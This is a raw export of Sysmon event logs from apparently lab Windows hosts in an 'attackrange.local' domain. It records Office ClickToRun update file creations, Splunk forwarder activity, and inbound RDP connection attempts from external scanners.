14:54:04.190{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-private-l1-1-0.dll2021-04-20 14:54:04.190 11241100x800000000000000063854Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.190{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-process-l1-1-0.dll2021-04-20 14:54:04.190 10341000x800000000000000063853Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:04.143{A7A01FEF-EB0B-607E-750B-00000000BB01}64887084C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000063852Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.128{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Data.DataFeedClient.dll2021-04-20 14:54:04.128 11241100x800000000000000063851Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.128{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Data.Edm.dll2021-04-20 14:54:04.128 11241100x800000000000000063850Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.112{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Data.Odata.dll2021-04-20 14:54:04.112 23542300x800000000000000049452Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:04.165{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2B5F0AB1E5A2FB03F4EE97E5A9430BD,SHA256=36FDFDA24139474DEB08B72BF33380782BFB5AF7B11D20AFA2B495500842DA93,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049451Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:01.649{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52479-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 11241100x800000000000000063967Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:05.987{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OneNote\SendToOneNoteFilter.dll2021-04-20 14:54:05.987 11241100x800000000000000063966Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:05.956{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONENOTEW32.DLL2021-04-20 14:54:05.956 354300x800000000000000063965Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:04.279{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com57478-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000063964Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:04.169{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57482-false10.0.1.12-8000- 354300x800000000000000063963Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:03.874{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-17018-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 11241100x800000000000000063962Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:05.815{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONMAINW32.DLL2021-04-20 14:54:05.815 11241100x800000000000000063961Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:05.815{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONPPTAddin.dll2021-04-20 14:54:05.815 11241100x800000000000000063960Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:05.815{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONWordAddin.dll2021-04-20 14:54:05.815 11241100x800000000000000063959Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:05.789{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OSF.DLL2021-04-20 14:54:05.789 11241100x800000000000000063958Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:05.789{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OSFSHARED.DLL2021-04-20 14:54:05.789 11241100x800000000000000063957Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:05.768{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OsfTaskengine.dll2021-04-20 14:54:05.768 11241100x800000000000000063956Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:05.768{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OSFUI.DLL2021-04-20 14:54:05.768 11241100x800000000000000063955Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:05.722{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OUTLFLTR.DLL2021-04-20 14:54:05.722 11241100x800000000000000063954Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:05.690{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000042\mecontrol.win32.bundle.LICENSE.txt2021-04-20 14:54:05.690 11241100x800000000000000063953Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:05.690{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookReactNative\SearchView\NOTICE.txt2021-04-20 14:54:05.690 11241100x800000000000000063952Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:05.675{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OUTLLIBR.COMMON.DLL2021-04-20 14:54:05.675 11241100x800000000000000063951Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:05.675{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OUTLMIME.DLL2021-04-20 14:54:05.675 11241100x800000000000000063950Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:05.659{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OUTLPH.DLL2021-04-20 14:54:05.659 11241100x800000000000000063949Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:05.659{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookWebHost.dll2021-04-20 14:54:05.659 11241100x800000000000000063948Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:05.628{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview.win32.bundle.tpn.txt2021-04-20 14:54:05.612 11241100x800000000000000063947Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:05.612{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview.win32.bundle.LICENSE.txt2021-04-20 14:54:05.612 11241100x800000000000000063946Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:05.597{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SAEXT.DLL2021-04-20 14:54:05.597 11241100x800000000000000063945Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:05.597{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SDXHelper.exe2021-04-20 14:54:05.597 11241100x800000000000000063944Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:05.597{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\rtmmvrhw.dll2021-04-20 14:54:05.597 11241100x800000000000000063943Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:05.597{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PEOPLEDATAHANDLER.DLL2021-04-20 14:54:05.597 11241100x800000000000000063942Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:05.597{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\rtmvc1decmft.dll2021-04-20 14:54:05.597 11241100x800000000000000063941Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:05.597{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\RTC.DLL2021-04-20 14:54:05.597 11241100x800000000000000063940Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:05.597{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PersonaSpy\notice.txt2021-04-20 14:54:05.597 11241100x800000000000000063939Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:05.534{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PPTICO.EXE2021-04-20 14:54:05.534 11241100x800000000000000063938Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:05.534{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\msgr3jp.dll2021-04-20 14:54:05.534 11241100x800000000000000063937Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:05.503{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBCONV.DLL2021-04-20 14:54:05.503 11241100x800000000000000063936Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:05.503{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUB6INTL.COMMON.DLL2021-04-20 14:54:05.503 11241100x800000000000000063935Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:05.503{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PSTPRX32.DLL2021-04-20 14:54:05.503 11241100x800000000000000063934Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:05.503{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\protocolhandler.exe2021-04-20 14:54:05.503 11241100x800000000000000063933Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:05.503{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000049\index.win32.bundle.LICENSE.txt2021-04-20 14:54:05.503 23542300x800000000000000063932Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:05.034{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6D387787D4C2CAAA6F6E4360F8306E87,SHA256=06B54F01873C57C272D6E89815F4B502D599293D64C2F01F9CC653E833D30259,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000063931Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:05.003{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000056\index.win32.bundle.LICENSE.txt2021-04-20 14:54:05.003 23542300x800000000000000049455Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:05.228{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A828242A8D6255E50D492E49D42D390,SHA256=071DCE6A961498C9058ADF63A02789D9E084068C90A7DB8B5399E5BC700E1233,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049454Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:03.072{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-50206-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049453Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:03.008{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com55464-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000064021Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:05.323{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-18385-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000064020Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:05.222{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-21115-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000064019Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:06.909{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4D8EC231223B536C2B1B5CF0729D4D75,SHA256=D6418BCF731AFFA6BCC157AACCAA21CE986E4F8BAFB1855574B21C13663DDE5C,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000064018Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:06.909{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\msoia.exe2021-04-20 14:54:06.909 11241100x800000000000000064017Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.862{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\NL7Lexicons0011.DLL2021-04-20 14:54:06.862 11241100x800000000000000064016Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.862{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\NL7Models0011.DLL2021-04-20 14:54:06.862 11241100x800000000000000064015Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.862{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSOSTYLE.DLL2021-04-20 14:54:06.862 11241100x800000000000000064014Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.862{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSVCP140_APP.DLL2021-04-20 14:54:06.862 11241100x800000000000000064013Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.862{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSOSPECTRE.DLL2021-04-20 14:54:06.862 11241100x800000000000000064012Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.862{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OARTODF.DLL2021-04-20 14:54:06.862 23542300x800000000000000064011Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:06.862{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93316DACA561B628559681DDC0950F70,SHA256=C1F44F5815F2CCD98E174B86EEA014D7DAECD83407C34C10FCD0954330E87429,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000064010Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.862{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSOSVG.DLL2021-04-20 14:54:06.862 11241100x800000000000000064009Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.784{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\msotdaddin.dll2021-04-20 14:54:06.784 11241100x800000000000000064008Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.784{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OCIntlDate.dll2021-04-20 14:54:06.784 11241100x800000000000000064007Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.784{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ocmsptls.dll2021-04-20 14:54:06.784 11241100x800000000000000064006Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:06.784{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OcOffice.dll2021-04-20 14:54:06.784 